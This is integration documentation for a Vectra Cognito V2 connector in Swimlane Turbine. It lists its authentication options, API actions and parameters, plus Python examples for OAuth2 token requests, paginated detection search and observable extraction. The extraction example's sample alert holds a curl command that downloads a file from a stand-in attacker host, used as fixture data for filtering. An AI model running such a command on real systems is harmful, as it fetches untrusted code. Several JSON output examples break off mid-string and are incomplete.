# Vectra Cognito V2

Vectra Cognito V2 is a network detection and response platform that uses AI to detect and respond to cyber threats.

## Overview

Vectra Cognito V2 is a leading Network Detection and Response platform that uses AI to detect and respond to cyber threats in real time. This connector enables seamless integration with Swimlane Turbine, allowing users to automate security operations by retrieving detailed host and detection information, adding notes and tags, and managing detections efficiently. By leveraging this integration, security teams can enhance their threat management capabilities, streamline workflows, and improve response times to potential security incidents.

## Prerequisites

Before you can use the Vectra Cognito V2 connector for Turbine, you'll need access to the Vectra API. This requires one of the following:

- API key authentication, using the following parameters:
  - URL: the endpoint URL for accessing the Vectra API
  - API Token: a token used to authenticate API requests
- OAuth2 authorization, using the following parameters:
  - URL: the endpoint URL for accessing the Vectra API
  - Client ID: the client identifier for OAuth2 authentication
  - Secret Key: the secret key associated with the Client ID
  - Token URL: the URL used to obtain the OAuth2 token

## Capabilities

The Vectra Cognito connector provides the following capabilities:

- Add Detection Notes
- Add Host Notes
- Add Tags
- Get Host by ID
- Get Hosts
- Get Triage Rule by ID
- Retrieve Detections
- Update Detection

## Configurations

### Vectra Cognito Version 2 API Key Authentication

Authenticates using an API token.

Configuration parameters:

| Parameter | Description | Type | Required |
| --- | --- | --- | --- |
| url | A URL to the target host | string | required |
| api_token | API token | string | required |
| verify_ssl | Verify SSL certificate | boolean | optional |
| http_proxy | A proxy to route requests through | string | optional |

### Vectra Cognito OAuth2 Client Credentials

Authenticates using the OAuth2 client credentials grant with HTTP Basic Auth against the Vectra API v2.5 token endpoint.

Configuration parameters:

| Parameter | Description | Type | Required |
| --- | --- | --- | --- |
| url | Base URL of the Vectra portal (e.g., `https://<vectra-portal-url>`) | string | required |
| token_url | Full URL to the OAuth2 token endpoint (e.g., `https://<vectra-portal-url>/api/v2.5/oauth2/token`) | string | required |
| client_id | The Client ID obtained when creating your API client (used as the Basic Auth username) | string | required |
| client_secret | The secret key obtained when creating your API client (used as the Basic Auth password) | string | required |
| verify_ssl | Verify SSL certificate | boolean | optional |
| http_proxy | A proxy to route requests through | string | optional |

## Actions

### Add Detection Notes

Append notes to a specific detection, identified by its detection ID, in Vectra Cognito V2.

- Endpoint URL: `/api/v2.5/detections/{{detection_id}}/notes`
- Method: POST

Input arguments:

| Name | Type | Required | Description |
| --- | --- | --- | --- |
| path_parameters.detection_id | string | required | Parameters for the Add Detection Notes action |
| note | string | optional | Parameter for Add Detection Notes |

Input example:

```json
{"json_body": {"note": "This is a detection note"}}
```

Output parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| status_code | number | HTTP status code of the response |
| reason | string | Response reason phrase |
| id | number | Unique identifier |
| date_created | string | Output field date_created |
| date_modified | object | Output field date_modified |
| created_by | string | Output field created_by |
| modified_by | object | Output field modified_by |
| note | string | Output field note |

Output example:

```json
{
  "status_code": 200,
  "response_headers": {
    "Content-Length": "140",
    "Content-Type": "application/json",
    "Date": "Mon, 15 Apr 2024 20:37:23 GMT"
  },
  "reason": "OK",
  "json_body": {
    "id": 2,
    "date_created": "2021-01-11T14:14:10.527603Z",
    "date_modified": null,
    "created_by": "vadmin",
    "modified_by": null,
    "note": "This is a detection note"
  }
}
```

### Add Host Notes

Append notes to a specified host in Vectra Cognito V2 using the host's unique identifier; requires path parameters and a JSON body.

- Endpoint URL: `/api/v2.5/hosts/{{host_id}}/notes`
- Method: POST

Input arguments:

| Name | Type | Required | Description |
| --- | --- | --- | --- |
| path_parameters.host_id | string | required | Parameters for the Add Host Notes action |
| note | string | optional | Parameter for Add Host Notes |

Input example:

```json
{"json_body": {"note": "This is a note"}}
```

Output parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| status_code | number | HTTP status code of the response |
| reason | string | Response reason phrase |
| id | number | Unique identifier |
| date_created | string | Output field date_created |
| date_modified | object | Output field date_modified |
| created_by | string | Output field created_by |
| modified_by | object | Output field modified_by |
| note | string | Output field note |

Output example:

```json
{
  "status_code": 200,
  "response_headers": {
    "Content-Length": "140",
    "Content-Type": "application/json",
    "Date": "Mon, 15 Apr 2024 20:37:23 GMT"
  },
  "reason": "OK",
  "json_body": {
    "id": 2,
    "date_created": "2021-01-11T13:54:47.987918Z",
    "date_modified": null,
    "created_by": "vadmin",
    "modified_by": null,
    "note": "This is a note"
  }
}
```

### Add Tags

Add a new tag to a specified host in Vectra Cognito V2 using the host's unique identifier.

- Endpoint URL: `/api/v2.5/tagging/host/{{host_id}}`
- Method: PATCH

Input arguments:

| Name | Type | Required | Description |
| --- | --- | --- | --- |
| path_parameters.host_id | string | required | Parameters for the Add Tags action |
| tags | array | optional | Parameter for Add Tags |

Input example:

```json
{"json_body": {"tags": ["test", "new tag", "This is a tag", "We need to follow up on this host."]}}
```

Output parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| status_code | number | HTTP status code of the response |
| reason | string | Response reason phrase |

Output example:

```json
{
  "status_code": 200,
  "response_headers": {
    "Content-Length": "140",
    "Content-Type": "application/json",
    "Date": "Mon, 15 Apr 2024 20:37:23 GMT"
  },
  "reason": "OK",
  "json_body": {}
}
```

### Get Host by ID

Retrieve detailed information for a specific host in Vectra Cognito V2 using the unique host ID.

- Endpoint URL: `/api/v2.5/hosts/{{id}}`
- Method: GET

Input arguments:

| Name | Type | Required | Description |
| --- | --- | --- | --- |
| path_parameters.id | string | required | Parameters for the Get Host by ID action |

Input example:

```json
{"path_parameters": {"id": 1}}
```

Output parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| status_code | number | HTTP status code of the response |
| reason | string | Response reason phrase |
| id | number | Unique identifier |
| name | string | Name of the resource |
| active_traffic | boolean | Output field active_traffic |
| t_score | number | Score value |
| c_score | number | Score value |
| last_source | string | Output field last_source |
| previous_ips | array | Output field previous_ips |
| last_detection_timestamp | string | Output field last_detection_timestamp |
| key_asset | boolean | Output field key_asset |
| state | string | Output field state |
| targets_key_asset | boolean | Output field targets_key_asset |
| probable_owner | string | Output field probable_owner |
| detection_set | array | Output field detection_set |
| host_artifact_set | array | Output field host_artifact_set |
| host_artifact_set.type | string | Type of the resource |
| host_artifact_set.value | string | Value for the parameter |
| sensor | object | Output field sensor |
| tags | array | Output field tags |
| note | string | Output field note |
| note_modified_by | string | Output field note_modified_by |
| note_modified_timestamp | string | Output field note_modified_timestamp |
| notes | array | Output field notes |
| notes.id | number | Unique identifier |

Output example:

```json
{
  "status_code": 200,
  "response_headers": {
    "Content-Type": "application/x-www-form-urlencoded",
    "Date": "Wed, 21 Jun 2023 20:37:23 GMT"
  },
  "reason": "OK",
  "json_body": {
    "id": 1029,
    "name": "insightws07",
    "active_traffic": true,
    "t_score": 90,
    "c_score": 99,
    "last_source": "10.16.6.6",
    "previous_ips": ["10.16.12.1", "10.16.0.1"],
    "last_detection_timestamp": "2019-08-28T19:05:12Z",
    "key_asset": false,
    "state": "active",
    "targets_key_asset": true,
    "probable_owner": "dkelle",
    "detection_set": ["https://10.1.6.10/api/v2.5/detections/1354
```

### Get Hosts

Retrieve comprehensive information on all hosts from Vectra Cognito V2.

- Endpoint URL: `/api/v2.5/hosts`
- Method: GET

Input arguments:

| Name | Type | Required | Description |
| --- | --- | --- | --- |
| parameters.fields | string | optional | Filters objects listed |
| parameters.page | number | optional | Page number. Possible values are a positive integer or `last` |
| parameters.page_size | number | optional | Page size. Possible values are a positive integer up to 5000 |
| parameters.ordering | string | optional | Orders records by last_timestamp, threat_score and certainty_score. The default sorts threat and certainty score in ascending order; scores can be sorted in descending order by prepending the query with the minus symbol |
| parameters.name | string | optional | Filter by name |
| parameters.state | string | optional | Filter by state: active or inactive |
| parameters.last_source | string | optional | Filter by last source (IP address) |
| parameters.t_score | number | optional | Filter by threat score |
| parameters.t_score_gte | number | optional | Filter by threat score >= the score provided |
| parameters.c_score | number | optional | Filter by certainty score |
| parameters.c_score_gte | number | optional | Filter by certainty score >= the score provided |
| parameters.last_detection_timestamp | string | optional | Filter by last detection timestamp |
| parameters.last_detection_timestamp_gte | string | optional | Filter by last detection timestamp >= the timestamp provided |
| parameters.last_detection_timestamp_lte | string | optional | Filter by last detection timestamp <= the timestamp provided |
| parameters.tags | string | optional | Filter by a tag or a comma-separated list of tags (returns hosts that contain any of the tags specified), e.g. `tags=baz` or `tags=foo,bar` |
| parameters.key_asset | boolean | optional | Filter by key asset: true, false |
| parameters.min_id | number | optional | Filter hosts that have an ID greater than or equal to min_id |
| parameters.max_id | number | optional | Filter hosts that have an ID less than or equal to max_id |
| parameters.mac_address | string | optional | Filter by MAC address |
| parameters.note_modified_timestamp_gte | string | optional | Filter by note modified timestamp >= the timestamp provided |
| parameters.privilege_level | number | optional | Filter by exact privilege level of hosts (1-10) |
| parameters.privilege_level_gte | number | optional | Filter hosts that have a privilege level greater than or equal to the supplied number (1-10) |
| parameters.privilege_category | string | optional | Filter hosts by privilege category. Options are `low`, `medium` and `high` |

Input example:

```json
{
  "parameters": {
    "fields": "string",
    "page": 123,
    "page_size": 123,
    "ordering": "string",
    "name": "example name",
    "state": "string",
    "last_source": "string",
    "t_score": 123,
    "t_score_gte": 123,
    "c_score": 123,
    "c_score_gte": 123,
    "last_detection_timestamp": "string",
    "last_detection_timestamp_gte": "string",
    "last_detection_timestamp_lte": "string",
    "tags": "string",
    "key_asset": true,
    "min_id": 123,
    "max_id": 123,
    "mac_address": "string",
    "note_modified_timestamp_gte": "string",
    "privilege_level": 123,
    "privilege_level_gte": 123,
    "privilege_category": "string"
  }
}
```

Output parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| status_code | number | HTTP status code of the response |
| reason | string | Response reason phrase |
| id | number | Unique identifier |
| name | string | Name of the resource |
| active_traffic | boolean | Output field active_traffic |
| t_score | number | Score value |
| c_score | number | Score value |
| last_source | string | Output field last_source |
| previous_ips | array | Output field previous_ips |
| last_detection_timestamp | string | Output field last_detection_timestamp |
| key_asset | boolean | Output field key_asset |
| state | string | Output field state |
| targets_key_asset | boolean | Output field targets_key_asset |
| probable_owner | string | Output field probable_owner |
| detection_set | array | Output field detection_set |
| host_artifact_set | array | Output field host_artifact_set |
| host_artifact_set.type | string | Type of the resource |
| host_artifact_set.value | string | Value for the parameter |
| sensor | object | Output field sensor |
| tags | array | Output field tags |
| note | string | Output field note |
| note_modified_by | string | Output field note_modified_by |
| note_modified_timestamp | string | Output field note_modified_timestamp |
| notes | array | Output field notes |
| notes.id | number | Unique identifier |

Output example:

```json
{
  "status_code": 200,
  "response_headers": {
    "Content-Type": "application/x-www-form-urlencoded",
    "Date": "Wed, 21 Jun 2023 20:37:23 GMT"
  },
  "reason": "OK",
  "json_body": {
    "id": 1029,
    "name": "insightws07",
    "active_traffic": true,
    "t_score": 90,
    "c_score": 99,
    "last_source": "10.16.6.6",
    "previous_ips": ["10.16.12.1", "10.16.0.1"],
    "last_detection_timestamp": "2019-08-28T19:05:12Z",
    "key_asset": false,
    "state": "active",
    "targets_key_asset": true,
    "probable_owner": "dkelle",
    "detection_set": ["https://10.1.6.10/api/v2.5/detections/1354
```

### Get Triage Rule by ID

Retrieve a specific triage rule from Vectra Cognito V2 using the unique identifier provided in the path parameters.

- Endpoint URL: `/api/v2.5/rules/{{id}}`
- Method: GET

Input arguments:

| Name | Type | Required | Description |
| --- | --- | --- | --- |
| path_parameters.id | string | required | Parameters for the Get Triage Rule by ID action |

Input example:

```json
{"path_parameters": {"id": "12345678-1234-1234-1234-123456789abc"}}
```

Output parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| status_code | number | HTTP status code of the response |
| reason | string | Response reason phrase |
| id | number | Unique identifier |
| url | string | URL endpoint for the request |
| description | string | Output field description |
| enabled | boolean | Output field enabled |
| created_timestamp | string | Output field created_timestamp |
| last_timestamp | object | Output field last_timestamp |
| is_whitelist | boolean | Output field is_whitelist |
| priority | object | Output field priority |
| active_detections | number | Output field active_detections |
| total_detections | number | Output field total_detections |
| template | boolean | Output field template |
| additional_conditions | object | Output field additional_conditions |
| additional_conditions.OR | array | Output field additional_conditions.OR |
| additional_conditions.OR.AND | array | Output field additional_conditions.OR.AND |
| additional_conditions.OR.AND.ANY_OF | object | Output field additional_conditions.OR.AND.ANY_OF |
| additional_conditions.OR.AND.ANY_OF.field | string | Output field additional_conditions.OR.AND.ANY_OF.field |
| additional_conditions.OR.AND.ANY_OF.values | array | Value for the parameter |
| additional_conditions.OR.AND.ANY_OF.groups | array | Output field additional_conditions.OR.AND.ANY_OF.groups |
| additional_conditions.OR.AND.ANY_OF.label | string | Output field additional_conditions.OR.AND.ANY_OF.label |
| source_conditions | object | Output field source_conditions |
| source_conditions.OR | array | Output field source_conditions.OR |
| source_conditions.OR.AND | array | Output field source_conditions.OR.AND |
| source_conditions.OR.AND.ANY_OF | object | Output field source_conditions.OR.AND.ANY_OF |

Output example:

```json
{
  "status_code": 200,
  "response_headers": {
    "Content-Length": "140",
    "Content-Type": "application/json",
    "Date": "Mon, 15 Apr 2024 20:37:23 GMT"
  },
  "reason": "OK",
  "json_body": {
    "id": 68,
    "url": "https://1.1.1.1/api/v2.5/rules/68",
    "description": "Expected behavior from these devices",
    "enabled": true,
    "created_timestamp": "2019-08-27T20:55:29Z",
    "last_timestamp": null,
    "is_whitelist": false,
    "priority": null,
    "active_detections": 2,
    "total_detections": 3,
    "template": true,
    "additional_conditions": {"OR": []},
    "source_conditions": {"OR
```

### Retrieve Detections

Gather all detection data from Vectra Cognito V2, providing a comprehensive overview of potential security threats.

- Endpoint URL: `/api/v2.5/detections`
- Method: GET

Input arguments:

| Name | Type | Required | Description |
| --- | --- | --- | --- |
| parameters.fields | string | optional | Filters objects listed |
| parameters.page | number | optional | Page number. Possible values are a positive integer or `last` |
| parameters.page_size | number | optional | Page size. Possible values are a positive integer, up to 5000 |
| parameters.ordering | string | optional | Orders records by last_timestamp, threat_score and certainty_score. The default sorts threat and certainty score in ascending order; scores can be sorted in descending order by prepending the query with the minus symbol |
| parameters.min_id | number | optional | Greater than or equal to (>=) the ID provided |
| parameters.max_id | number | optional | Less than or equal to (<=) the ID provided |
| parameters.state | string | optional | Filter by state: active, inactive, ignored, ignored_for_all |
| parameters.category | string | optional | Filter by the detection category. This performs a partial word match; for example, you can use `recon` to query all RECONNAISSANCE category detections |
| parameters.detection_type | string | optional | Filter by the name of the threat detected |
| parameters.detection_category | string | optional | Filter by the detection category |
| parameters.src_ip | string | optional | Filter by source (IP address) |
| parameters.t_score | number | optional | Filter by threat score |
| parameters.t_score_gte | number | optional | Filter by threat score >= the score provided |
| parameters.threat_score | number | optional | Filter by threat score |
| parameters.threat_gte | number | optional | Filter by threat score >= the score provided |
| parameters.c_score | number | optional | Filter by certainty score |
| parameters.c_score_gte | number | optional | Filter by certainty score >= the score provided |
| parameters.certainty | number | optional | Filter by certainty score |
| parameters.certainty_gte | number | optional | Filter by certainty score >= the score provided |
| parameters.last_timestamp_gte | string | optional | Filter by last timestamp >= the date provided |
| parameters.last_timestamp | string | optional | Filter by last timestamp |
| parameters.host_id | number | optional | Filter by ID of the host object a detection is attributed to |
| parameters.tags | string | optional | Filter by a tag or a comma-separated list of tags |
| parameters.destination | string | optional | Filter by destination in the detection detail set |
| parameters.proto | string | optional | Filter by the protocol in the detection detail set |

Input example:

```json
{
  "parameters": {
    "fields": "string",
    "page": 123,
    "page_size": 123,
    "ordering": "string",
    "min_id": 123,
    "max_id": 123,
    "state": "string",
    "category": "string",
    "detection_type": "string",
    "detection_category": "string",
    "src_ip": "string",
    "t_score": 123,
    "t_score_gte": 123,
    "threat_score": 123,
    "threat_gte": 123,
    "c_score": 123,
    "c_score_gte": 123,
    "certainty": 123,
    "certainty_gte": 123,
    "last_timestamp_gte": "string",
    "last_timestamp": "string",
    "host_id": 123,
    "tags": "string",
    "destination": "string",
    "proto": "string",
    "is_targeting_key_asset": true,
    "note_modified_timestamp_gte": "string",
    "return_as_turbine_schema": true,
    "alert_organization": "string",
    "ioc_types": ["string"],
    "domains_ignore_list": "string",
    "ip_cidr_ignore_list": "string",
    "regex_ignore": "string",
    "ioc_ignore_paths": ["string"]
  }
}
```

Output parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| status_code | number | HTTP status code of the response |
| reason | string | Response reason phrase |
| last_timestamp | string | Output field last_timestamp |
| grouped_details | array | Output field grouped_details |
| grouped_details.num_sessions | number | Output field grouped_details.num_sessions |
| grouped_details.protocol | string | Output field grouped_details.protocol |
| grouped_details.last_timestamp | string | Output field grouped_details.last_timestamp |
| grouped_details.host_detection | number | Output field grouped_details.host_detection |
| grouped_details.accounts | array | Output field grouped_details.accounts |
| grouped_details.is_host_detail | boolean | Output field grouped_details.is_host_detail |
| grouped_details.bytes_received | number | Output field grouped_details.bytes_received |
| grouped_details.dst_geo | object | Output field grouped_details.dst_geo |
| grouped_details.src_ip | string | Output field grouped_details.src_ip |
| grouped_details.dst_ips | array | Output field grouped_details.dst_ips |
| grouped_details.grouping_field | string | Output field grouped_details.grouping_field |
| grouped_details.description | object | Output field grouped_details.description |
| grouped_details.is_account_detail | boolean | Output field grouped_details.is_account_detail |
| grouped_details.dst_ports | array | Output field grouped_details.dst_ports |
| grouped_details.account_detection | object | Output field grouped_details.account_detection |
| grouped_details.first_timestamp | string | Output field grouped_details.first_timestamp |
| grouped_details.dst_geo_lat | object | Output field grouped_details.dst_geo_lat |
| grouped_details.dst_geo_lon | object | Output field grouped_details.dst_geo_lon |
| grouped_details.bytes_sent | number | Output field grouped_details.bytes_sent |
| grouped_details.target_domains | array | Output field grouped_details.target_domains |
| grouped_details.account_uid | object | Unique identifier |

Output example:

```json
{
  "status_code": 200,
  "response_headers": {
    "Content-Length": "140",
    "Content-Type": "application/json",
    "Date": "Mon, 15 Apr 2024 20:37:23 GMT"
  },
  "reason": "OK",
  "json_body": {
    "last_timestamp": "2019-08-27T20:13:08Z",
    "grouped_details": [{}],
    "custom_detection": null,
    "is_custom_model": false,
    "detection": "Hidden HTTP Tunnel",
    "detection_type": "Hidden HTTP Tunnel",
    "is_targeting_key_asset": false,
    "note_modified_timestamp": "2021-12-15T17:26:41Z",
    "c_score": 59,
    "t_score": 10,
    "id": 36,
    "category": "COMMAND & CONTROL",
    "src_ip": "
```

### Search Detections

Search detections using Vectra's Lucene-style query language against the v2.5 search endpoint, supporting pagination and optional normalization to Turbine schema alerts.

- Endpoint URL: `/api/v2.5/search/detections`
- Method: GET

Input arguments:

| Name | Type | Required | Description |
| --- | --- | --- | --- |
| parameters.query_string | string | required | Lucene-style search query for detections. Examples: `detection.is_triaged:false AND detection.grouped_details.dst_ports:445`, `detection.grouped_details.target_domains:snakeoil.biz`, `detection.last_timestamp:[now-1d TO now] AND (detection.is_triaged:false)` |
| parameters.page_size | number | optional | Number of results returned per page. Default is 50; maximum is 5000 |
| parameters.return_as_turbine_schema | boolean | optional | If true, returns results as normalized Turbine schema alerts instead of the raw API response |
| parameters.alert_organization | string | optional | Optional organization name to include in the Turbine schema alert. Used only when return_as_turbine_schema is true |
| parameters.ioc_types | array | optional | List of observable types to extract. Supported: ipv4_public, ipv4_private, ipv6_public, ipv6_private, domain, url, email, sha1, sha256, md5. If omitted or empty, all types are extracted |
| parameters.domains_ignore_list | string | optional | Comma-separated domain values to exclude from observable extraction |
| parameters.ip_cidr_ignore_list | string | optional | Comma-separated CIDR ranges to exclude from observable extraction |
| parameters.regex_ignore | string | optional | Regex pattern; any observable value matching this pattern is excluded |
| parameters.ioc_ignore_paths | array | optional | Array of slash-separated field paths to strip from each alert before extracting observables. Supports wildcards (`*`) and nested paths. Example: `["processCommandLine", "context/*/ipAddress"]` |

Input example:

```json
{
  "parameters": {
    "query_string": "string",
    "page_size": 50,
    "return_as_turbine_schema": true,
    "alert_organization": "string",
    "ioc_types": ["string"],
    "domains_ignore_list": "string",
    "ip_cidr_ignore_list": "string",
    "regex_ignore": "string",
    "ioc_ignore_paths": ["string"]
  }
}
```

Output parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| status_code | number | HTTP status code of the response |
| reason | string | Response reason phrase |
| count | number | Total number of matching detections |
| next | string | URL of the next results page, or null if on the last page |
| previous | string | URL of the previous results page, or null if on the first page |
| results | array | Array of raw detection objects returned by the search |
| results.last_timestamp | string | Result of the operation |
| results.grouped_details | array | Result of the operation |
| results.grouped_details.num_sessions | number | Result of the operation |
| results.grouped_details.protocol | string | Result of the operation |
| results.grouped_details.last_timestamp | string | Result of the operation |
| results.grouped_details.host_detection | number | Result of the operation |
| results.grouped_details.accounts | array | Result of the operation |
| results.grouped_details.is_host_detail | boolean | Result of the operation |
| results.grouped_details.bytes_received | number | Result of the operation |
| results.grouped_details.dst_geo | object | Result of the operation |
| results.grouped_details.src_ip | string | Result of the operation |
| results.grouped_details.dst_ips | array | Result of the operation |
| results.grouped_details.grouping_field | string | Result of the operation |
| results.grouped_details.description | object | Result of the operation |
| results.grouped_details.is_account_detail | boolean | Result of the operation |
| results.grouped_details.dst_ports | array | Result of the operation |
| results.grouped_details.account_detection | object | Result of the operation |
| results.grouped_details.first_timestamp | string | Result of the operation |
| results.grouped_details.dst_geo_lat | object | Result of the operation |

Output example:

```json
{
  "status_code": 200,
  "response_headers": {"Content-Type": "application/json"},
  "reason": "OK",
  "json_body": {"count": 1, "next": null, "previous": null, "results": [{}]}
}
```

### Update Detection

Mark or unmark multiple detections as fixed in Vectra Cognito V2 using the provided JSON body.

- Endpoint URL: `/api/v2.5/detections`
- Method: PATCH

Input arguments:

| Name | Type | Required | Description |
| --- | --- | --- | --- |
| detectionIdList | array | optional | Unique identifier |
| mark_as_fixed | string | optional | Parameter for Update Detection |

Input example:

```json
{"detectionIdList": [123], "mark_as_fixed": "string"}
```

Output parameters:

| Parameter | Type | Description |
| --- | --- | --- |
| status_code | number | HTTP status code of the response |
| reason | string | Response reason phrase |

Output example:

```json
{
  "status_code": 200,
  "response_headers": {
    "Content-Length": "140",
    "Content-Type": "application/json",
    "Date": "Mon, 15 Apr 2024 20:37:23 GMT"
  },
  "reason": "OK",
  "json_body": {}
}
```

## Response Headers

| Header | Description | Example |
| --- | --- | --- |
| Content-Length | The length of the response body in bytes | 140 |
| Content-Type | The media type of the resource | application/json |
| Date | The date and time at which the message was originated | Mon, 15 Apr 2024 20:37:23 GMT |
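The following is an added example, not connector or Vectra code, showing how the OAuth2 Client Credentials configuration and the Search Detections pagination fit together: the Client ID and Client Secret go into an HTTP Basic header on the token endpoint, and the `next` link is followed until it is null. The portal URL, the `fetch_json` callable and the canned responses are assumptions made so the flow runs offline.

```python
import base64
from urllib.parse import urlencode

VECTRA_URL = "https://vectra.example"                 # placeholder portal URL
TOKEN_URL = VECTRA_URL + "/api/v2.5/oauth2/token"     # token endpoint named on the page


def build_token_request(token_url: str, client_id: str, client_secret: str) -> dict:
    """Client-credentials grant: the client id/secret travel in a Basic
    Authorization header and grant_type in a form-encoded body.  Returns the
    request parts instead of sending them so the shape can be checked offline."""
    creds = base64.b64encode(f"{client_id}:{client_secret}".encode()).decode()
    return {
        "method": "POST",
        "url": token_url,
        "headers": {"Authorization": "Basic " + creds,
                    "Content-Type": "application/x-www-form-urlencoded"},
        "body": urlencode({"grant_type": "client_credentials"}),
    }


def search_detections(fetch_json, base_url: str, access_token: str, query: str,
                      page_size: int = 50, max_pages: int = 100) -> list:
    """Call /api/v2.5/search/detections and follow `next` until it is null.
    fetch_json(url, headers) -> dict is injected so any HTTP client (or a
    canned stub) works; max_pages bounds a runaway loop on a misbehaving server."""
    if not 1 <= page_size <= 5000:
        raise ValueError("page_size must be between 1 and 5000")
    url = (base_url.rstrip("/") + "/api/v2.5/search/detections?"
           + urlencode({"query_string": query, "page_size": page_size}))
    headers = {"Authorization": "Bearer " + access_token, "Accept": "application/json"}
    results = []
    for _ in range(max_pages):
        page = fetch_json(url, headers)
        results.extend(page.get("results", []))
        url = page.get("next")          # null on the last page
        if not url:
            break
    return results


def canned_fetch(url: str, headers: dict) -> dict:
    """Offline stand-in for an HTTP client: two constructed pages in the shape
    the Search Detections output describes, the second with next == null."""
    if not headers.get("Authorization", "").startswith("Bearer "):
        raise PermissionError("missing bearer token")
    if url.endswith("&page=2"):
        return {"count": 3, "next": None, "previous": url.replace("&page=2", ""),
                "results": [{"id": 3, "detection_type": "Hidden HTTP Tunnel"}]}
    return {"count": 3, "next": url + "&page=2", "previous": None,
            "results": [{"id": 1, "detection_type": "Hidden HTTP Tunnel"},
                        {"id": 2, "detection_type": "Hidden HTTP Tunnel"}]}


if __name__ == "__main__":
    req = build_token_request(TOKEN_URL, "my-client-id", "my-client-secret")
    print(req["method"], req["url"], req["headers"]["Content-Type"])   # never log the secret
    found = search_detections(canned_fetch, VECTRA_URL, "token-from-step-1",
                              "detection.is_triaged:false AND detection.grouped_details.dst_ports:445")
    print(len(found), "detections across all pages")
```

With a real client, keep `verify_ssl` enabled so the bearer token is only ever sent to the portal whose certificate you expect.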
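The observable-extraction controls shared by Retrieve Detections and Search Detections (ioc_types, domains_ignore_list, ip_cidr_ignore_list, regex_ignore and ioc_ignore_paths with `*` wildcards) are easiest to understand by implementing them. This is an added illustration, not the connector's code: it covers only the ipv4_public, ipv4_private and domain types, and the alert document is constructed.

```python
import ipaddress
import re

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
DOMAIN_RE = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b", re.I)

# Constructed alert shaped like a Retrieve Detections result; not real data.
SAMPLE_ALERT = {
    "detection_type": "Hidden HTTP Tunnel",
    "src_ip": "10.16.6.6",
    "processCommandLine": "curl http://evil.example.net/x -o /tmp/x",
    "context": [{"ipAddress": "203.0.113.9", "note": "via corp-proxy.corp.local"}],
    "grouped_details": [{"dst_ips": ["1.1.1.1", "10.1.6.10"],
                         "target_domains": ["snakeoil.biz", "cdn.vendor.example"]}],
}

def _path_regex(pattern: str) -> re.Pattern:
    """'context/*/ipAddress' -> regex in which '*' matches one path segment."""
    segs = ["[^/]+" if s == "*" else re.escape(s) for s in pattern.split("/")]
    return re.compile("^" + "/".join(segs) + "$")

def strip_paths(node, ioc_ignore_paths):
    """Copy of node without fields whose slash-separated path (list indexes
    count as segments) matches any entry of ioc_ignore_paths."""
    matchers = [_path_regex(p) for p in ioc_ignore_paths]

    def walk(cur, here: str):
        if isinstance(cur, dict):
            return {k: walk(v, f"{here}/{k}".lstrip("/")) for k, v in cur.items()
                    if not any(m.match(f"{here}/{k}".lstrip("/")) for m in matchers)}
        if isinstance(cur, list):
            return [walk(v, f"{here}/{i}") for i, v in enumerate(cur)]
        return cur
    return walk(node, "")

def extract_observables(alert: dict, ioc_types=None, domains_ignore_list: str = "",
                        ip_cidr_ignore_list: str = "", regex_ignore=None,
                        ioc_ignore_paths=()) -> dict:
    """Bucket observables found in string values under the page's type names
    (only ipv4_public, ipv4_private and domain are implemented here).  Python's
    is_private also covers reserved/documentation ranges such as 203.0.113.0/24."""
    doc = strip_paths(alert, ioc_ignore_paths)
    skip_domains = {d.strip().lower() for d in domains_ignore_list.split(",") if d.strip()}
    skip_nets = [ipaddress.ip_network(c.strip(), strict=False)
                 for c in ip_cidr_ignore_list.split(",") if c.strip()]
    skip_re = re.compile(regex_ignore) if regex_ignore else None
    found: dict = {}

    def add(kind: str, value: str) -> None:
        if (ioc_types and kind not in ioc_types) or (skip_re and skip_re.search(value)):
            return  # type not requested, or value matches regex_ignore
        found.setdefault(kind, set()).add(value)

    def visit(v) -> None:
        if isinstance(v, (dict, list)):
            for x in (v.values() if isinstance(v, dict) else v):
                visit(x)
        elif isinstance(v, str):
            for ip in IPV4_RE.findall(v):
                try:
                    addr = ipaddress.IPv4Address(ip)
                except ValueError:
                    continue  # e.g. 999.1.1.1 slipped through the loose regex
                if not any(addr in net for net in skip_nets):
                    add("ipv4_private" if addr.is_private else "ipv4_public", ip)
            for dom in DOMAIN_RE.findall(v):
                d = dom.lower()
                if d not in skip_domains and not any(d.endswith("." + s) for s in skip_domains):
                    add("domain", d)
    visit(doc)
    return found
```

Stripping paths before extraction is what keeps command lines and proxy addresses from polluting the observable set; the CIDR, domain and regex filters then remove known-benign values.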